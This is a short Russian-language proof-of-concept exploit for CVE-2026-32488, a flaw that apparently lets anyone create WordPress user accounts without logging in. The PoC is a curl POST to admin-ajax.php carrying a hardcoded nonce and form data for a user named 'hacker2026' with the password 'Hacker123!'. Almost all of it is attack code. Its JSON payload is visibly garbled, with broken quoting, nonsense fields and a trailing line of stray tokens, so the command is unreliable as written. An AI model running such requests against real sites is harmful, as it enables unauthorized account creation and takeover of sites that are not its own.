
Эксплойт, подтверждающий концепцию, для CVE-2026-32488, нацеленный на регистрацию пользователей WordPress через специально созданные POST-запросы к admin-ajax.php, позволяющий создание пользователей без аутентификации.
CVE-2026-32488
$NONCE = "c82a4f80ba"
curl.exe -s -X POST "http://localhost/wp-admin/admin-ajax.php" -d "action=user_registration_user_form_submit"
-d "ur_frontend_form_nonce=$NONCE" -d "form_id=6"
-d "form_data=[{"field_name":"user_login","value":"hacker2026","field_type":"text"},{"field_name":",":",":"},{":",":",":"}]"
"user_email"value"field_type"email"field_name"user_pass"value"Hacker123!"field_type"password